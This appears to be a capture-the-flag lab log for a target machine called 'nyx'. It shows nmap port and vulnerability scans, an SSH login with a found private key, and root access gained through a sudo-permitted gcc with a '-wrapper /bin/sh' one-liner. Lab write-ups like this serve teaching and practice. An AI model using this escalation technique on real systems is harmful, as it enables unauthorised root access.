┌──(kali㉿kali)-[~] └─$ sudo nmap --min-rate 10000 -p- 192.1.1.138 [sudo] password for kali: Starting Nmap 7.92 ( https://nmap.org ) at 2023-06-16 22:28 EDT Nmap scan report for nyx.zte.com.cn (192.1.1.138) Host is up (0.00020s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 00:0C:29:A7:F7:7B (VMware)
Nmap done: 1 IP address (1 host up) scanned in 2.05 seconds
┌──(kali㉿kali)-[~] └─$ sudo nmap -sT -sV -O -sC -p22,80 192.1.1.138 Starting Nmap 7.92 ( https://nmap.org ) at 2023-06-16 22:28 EDT Nmap scan report for nyx.zte.com.cn (192.1.1.138) Host is up (0.00047s latency).
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 fc:8b:87:f4:36:cd:7d:0f:d8:f3:16:15:a9:47:f1:0b (RSA) | 256 b4:5c:08:96:02:c6:a8:0b:01:fd:49:68:dd:aa:fb:3a (ECDSA) |_ 256 cb:bf:22:93:69:76:60:a4:7d:c0:19:f3:c7:15:e7:3c (ED25519) 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-title: nyx |_http-server-header: Apache/2.4.38 (Debian) MAC Address: 00:0C:29:A7:F7:7B (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.6 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 11.27 seconds
Nmap done: 1 IP address (1 host up) scanned in 5.84 seconds
udp 的扫描结果仅供参考
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
┌──(kali㉿kali)-[~] └─$ sudo nmap --script=vuln -p22,80 192.1.1.138 [sudo] password for kali: Starting Nmap 7.92 ( https://nmap.org ) at 2023-06-16 22:29 EDT Nmap scan report for nyx.zte.com.cn (192.1.1.138) Host is up (0.00023s latency).
PORT STATE SERVICE 22/tcp open ssh 80/tcp open http | http-enum: |_ /d41d8cd98f00b204e9800998ecf8427e.php: Seagate BlackArmorNAS 110/220/440 Administrator Password Reset Vulnerability |_http-dombased-xss: Couldn\'t find any DOM based XSS. |_http-csrf: Couldn\'t find any CSRF vulnerabilities. |_http-stored-xss: Couldn\'t find any stored XSS vulnerabilities. MAC Address: 00:0C:29:A7:F7:7B (VMware)
Nmap done: 1 IP address (1 host up) scanned in 31.85 seconds
┌──(kali㉿kali)-[~/Downloads/nyx] └─$ ssh -i private mpampis@192.1.1.138 The authenticity of host '192.1.1.138 (192.1.1.138)' can\'t be established. ED25519 key fingerprint is SHA256:y+UuWVNQjou5NV3bhJKmkFBqomxtGR0c5ydJPwmIz+E. This key is not known by any other names Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.1.1.138' (ED25519) to the list of known hosts. @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ WARNING: UNPROTECTED PRIVATE KEY FILE! @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Permissions 0644 for 'private' are too open. It is required that your private key files are NOT accessible by others. This private key will be ignored. Load key "private": bad permissions mpampis@192.1.1.138\'s password: Permission denied, please try again. mpampis@192.1.1.138\'s password: Permission denied, please try again. mpampis@192.1.1.138\'s password: mpampis@192.1.1.138: Permission denied (publickey,password).
mpampis@nyx:~$ sudo -l Matching Defaults entries for mpampis on nyx: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User mpampis may run the following commands on nyx: (root) NOPASSWD: /usr/bin/gcc mpampis@nyx:~$ cd /tmp mpampis@nyx:/tmp$ sudo gcc -wrapper /bin/sh,-s . # whoami root # id uid=0(root) gid=0(root) groups=0(root) # cat /root/root.txt # cd /root # ls root.txt # cat root.txt